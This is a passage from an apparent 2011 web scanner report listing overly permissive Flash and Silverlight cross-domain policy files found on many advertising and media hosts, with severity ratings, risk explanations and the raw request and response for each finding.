<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.144. http://syndication.mmismm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:01 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:22:10 GMT
ETag: "10e-4a8db7b7df880"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

5.145. http://us.adserver.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 01 Sep 2011 16:38:40 GMT
Accept-Ranges: bytes
Content-Length: 2190
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
<allow-access-from domain="*.viki.com" />
<allow-access-from domain="*.vikistaging.net" />
<allow-access-from domain="vikiplayerdemo.heroku.com" />
<allow-access-from domain="*.btrll.com" />
<allow-access-from domain="cdn.visiblemeasures.com" />
...[SNIP]...

5.146. http://vid.catalog.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://vid.catalog.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: vid.catalog.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: zsCCIWDHuu+MJOugpNZNyggdx1Vy2NMalxMJ5KTgHmykcwfUUJ8f5N+qRFJm3Lem
x-amz-request-id: 6252969235804ECC
Date: Sat, 17 Sep 2011 01:11:16 GMT
x-amz-meta-cb-modifiedtime: Fri, 25 Mar 2011 16:59:33 GMT
Last-Modified: Fri, 25 Mar 2011 17:04:14 GMT
ETag: "337fabcd64c64b2446307d24d52f6902"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 577
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.newsinc.com"/>
   <allow-access-from domain="*.ap.org"/>
   <allow-access-from domain="*.amazonaws.com"/>
...[SNIP]...

5.147. http://www.att.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.att.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.att.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 06 Sep 2011 17:13:29 GMT
ETag: "1c4-4ac48f243e040"
Accept-Ranges: bytes
Content-Length: 452
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:51:52 GMT
Connection: close
Set-Cookie: TLTHID=9D6235CEE0CF10E0717F83B6C394B2DB; Path=/; Domain=.att.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.att.com"/>
   <allow-access-from domain="*.att.net"/>
   <allow-access-from domain="*.cingular.com"/>
   <allow-access-from domain="*.cingular.net"/>
   <allow-access-from domain="seattle.razorfishtc.com"/>
...[SNIP]...

5.148. http://www.bostonherald.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:13 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:03:12 GMT
Accept-Ranges: bytes
Content-Length: 335
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.149. http://www.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:58 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

5.150. http://www.tmz.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:56 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 23:00:57 GMT
ETag: "2d4aac-3f2-4a5dc3dea5c40"
Accept-Ranges: bytes
Content-Length: 1010
Connection: close
Content-Type: application/xml
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<cross-domain-policy>
<allow-access-from domain="*.tmz.com"/>
<allow-access-from domain="*.tmzdev.com"/>
<allow-access-from domain="*.blogsmithmedia.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.symbolforce.com"/>
<allow-access-from domain="*.yourminis.com"/>
<allow-access-from domain="*.tmz.vo.llnwd.net"/>
<allow-access-from domain="creative.myspace.com"/>
<allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="creative.myspacecdn.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.celebritytweet.com"/>
<allow-access-from domain="adserver.adtechus.com"/>
<allow-access-from domain="aka-cdn-ns.adtechus.com"/>
<allow-access-from domain="cdn.tremormedia.com"/>
<allow-access-from domain="adserver.adtech.de"/>
<allow-access-from domain="aka-cdn-ns.adtech.de"/>
<allow-access-from domain="t-ll-assets.cfec2.net"/>
<allow-access-from domain="*.kaltura.com"/>
...[SNIP]...

5.151. http://bigapple.contextuads.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bigapple.contextuads.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bigapple.contextuads.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:16:51 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 06 Nov 2008 16:51:30 GMT
ETag: "e540f3-160-1bbbc880"
Accept-Ranges: bytes
Content-Length: 352
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="monster.contextuads.com" />
<allow-access-from domain="sunshine.contextuads.com" />
...[SNIP]...

5.152. http://bit.ly/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bit.ly
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:35:31 GMT
Content-Type: text/xml
Content-Length: 278
Last-Modified: Wed, 25 May 2011 20:25:45 GMT
Connection: close
Expires: Mon, 19 Sep 2011 01:35:31 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://bit.ly/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="bit.ly" />
<allow-access-from domain="bitly.net" />
<allow-access-from domain="j.mp" />
<allow-access-from domain="bitly.com" />
...[SNIP]...

6. Silverlight cross-domain policy  previous  next
There are 20 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://2912a.v.fwmrm.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: 2912a.v.fwmrm.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "362062522"
Last-Modified: Thu, 28 Jan 2010 19:19:57 GMT
Content-Length: 426
Connection: keep-alive
Date: Sat, 17 Sep 2011 01:04:35 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

<?xml version="1.0" encoding="UTF-8"?>
<!-- Policy file for FreeWheel Media Servers. For support contact webmaster at freewheel dot tv -->
<access-policy>
<cross-domain-access>
<policy>
<a
...[SNIP]...
<domain uri="*"/>
...[SNIP]...

6.2. http://adm.fwmrm.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adm.fwmrm.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adm.fwmrm.net

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Jan 2010 19:20:16 GMT
ETag: "477-1aa-47e3e68abbc00"
Cteonnt-Length: 426
Cache-Control: max-age=21600
Expires: Sat, 17 Sep 2011 07:04:29 GMT
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:04:29 GMT
Content-Length: 426
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- Policy file for FreeWheel Media Servers. For support contact webmaster at freewheel dot tv -->
<access-policy>
<cross-domain-access>
<policy>
<a
...[SNIP]...
<domain uri="*"/>
...[SNIP]...

6.3. http://adunit.cdn.auditude.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: adunit.cdn.auditude.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:09:46 GMT
ETag: "1210291592"
Expires: Sat, 24 Sep 2011 01:09:46 GMT
Last-Modified: Tue, 23 Aug 2011 20:50:56 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 349
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers= "*">
<domain uri="*"/>
</allow-from>


...[SNIP]...

6.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 00:54:32 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.5. http://cdn.kaltura.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.kaltura.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
X-Me: pa-apache6
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/xml
Cache-Control: public, max-age=7775957
Expires: Fri, 16 Dec 2011 00:51:22 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 436
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*" />
<domain uri="http://*" />
...[SNIP]...
<domain uri="https://*" />
...[SNIP]...

6.6. http://cdnbakmi.kaltura.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnbakmi.kaltura.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdnbakmi.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
X-Me: pa-apache6
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/xml
Cache-Control: public, max-age=7776000
Expires: Fri, 16 Dec 2011 00:52:02 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 436
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*" />
<domain uri="http://*" />
...[SNIP]...
<domain uri="https://*" />
...[SNIP]...

6.7. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:38:37 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.8. http://dp.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:48 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:35:44 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

6.9. http://metrics.tmz.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.tmz.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:59 GMT
Server: Omniture DC/2.0.0
xserver: www86
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.10. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:52:41 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

6.11. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 16 Sep 2011 02:43:14 GMT
Expires: Sat, 17 Sep 2011 02:43:14 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 79647

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.12. http://spe.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sun, 18 Sep 2011 01:52:20 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.13. http://stats.kaltura.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.kaltura.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
X-Me: ny-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/xml
Expires: Sat, 17 Sep 2011 00:52:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:52:11 GMT
Content-Length: 436
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*" />
<domain uri="http://*" />
...[SNIP]...
<domain uri="https://*" />
...[SNIP]...

6.14. http://trk.vindicosuite.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: trk.vindicosuite.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:05:16 GMT
ETag: "3bab9858bc52cc1:0"
Last-Modified: Thu, 04 Aug 2011 15:36:58 GMT
Server: Microsoft-IIS/7.5
X-VINDICO-Instance: i-e9977187
Content-Length: 348
Connection: Close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

6.15. http://w88.go.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w88.go.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: w88.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:53 GMT
Server: Omniture DC/2.0.0
xserver: www595
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.16. http://www.kaltura.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.kaltura.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:03 GMT
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:33:10 GMT
Accept-Ranges: bytes
Content-Length: 436
Vary: Accept-Encoding
Cache-Control: max-age=7776000, public
Expires: Fri, 16 Dec 2011 00:52:03 GMT
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*" />
<domain uri="http://*" />
...[SNIP]...
<domain uri="https://*" />
...[SNIP]...

6.17. http://ts1.mm.bing.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ts1.mm.bing.net
Path:   /clientaccesspolicy.xml

